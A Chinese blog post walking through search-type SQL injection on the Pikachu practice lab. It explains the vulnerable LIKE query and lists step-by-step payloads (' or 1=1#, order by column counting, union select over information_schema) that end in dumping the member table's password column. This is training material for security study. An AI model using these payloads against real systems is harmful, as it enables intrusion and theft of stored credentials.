pikachu的搜索型注入

本文详细介绍了利用SQL注入技术针对Pikachu数据库进行攻击的过程,包括原理分析、操作步骤和逐步暴露敏感信息的方法。从字段验证到数据库爆破,展示了黑客如何利用'like'和'union'操作获取数据权限。
摘要由CSDN通过智能技术生成

pikachu的搜索型注入

一、原理

$sql="select * from user where password like '%$pwd%' order by password"

“%”匹配任何字符,“like”的意思就是像,这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。
构造对应的闭合,闭合前面的单引号和百分号,注释后面的百分号和单引号。构造的payload如下
xxxx%’ or 1=1#

二、操作

打开进入界面:
在这里插入图片描述
在这里插入图片描述
然后我们可以输入’ and 1=1 order by x#通过order by x来确定字段数,输入’ and 1=1 order by 3#时返回了正常页面:
在这里插入图片描述
而输入’ and 1=1 order by 4#时就回显了报错:
在这里插入图片描述
证明字段数为3。
然后输入’ and 1=2 union select 1,2,3#,回显了1、2、3:
在这里插入图片描述
证明1,2,3都可以回显。
输入’ and 1=2 union select 1,2,(database())#就可以爆出当前使用的数据库pikachu:
在这里插入图片描述
输入’ and 1=2 union select 1,2,table_name from information_schema.columns where table_schema=‘pikachu’#,就得到了pikachu数据库下的所有表名:
在这里插入图片描述

接着随便选一个表,输入’ and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘member’#,得到member表下的所有字段名:
在这里插入图片描述

然后输入’ and 1=2 union select 1,2,pw from pikachu.member#,就得到了字段pw的内容:
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值